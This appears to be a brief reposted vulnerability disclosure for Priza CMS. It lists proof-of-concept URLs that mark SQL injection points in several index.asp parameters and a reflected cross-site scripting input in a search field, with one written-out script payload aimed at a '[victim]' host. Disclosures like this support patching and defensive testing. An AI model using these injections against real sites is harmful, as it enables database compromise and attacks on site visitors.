Priza CMS Multiple Vulnerabilities

PoC/Exploit:
~~~~~~~~~~

~ [PoC] ~: /website_path/index.asp?p_id=201&id=[SQLi]

~ [PoC] ~: /website_path/index.asp?page_id=[SQLi]

~ [PoC] ~: /website_path/volumes.asp?id=18

~ [PoC] ~: /website_path/index.asp?action=find&page_id=28&string=[Xss]

~~~~~~~~ Exploit

~ [PoC] ~: Http://[victim]/path/index.asp?p_id=201&id=[SQLi]

~ [PoC] ~: Http://[victim]/path/index.asp?action=find&page_id=28&string="><script>alert(0)</script>

评论关闭。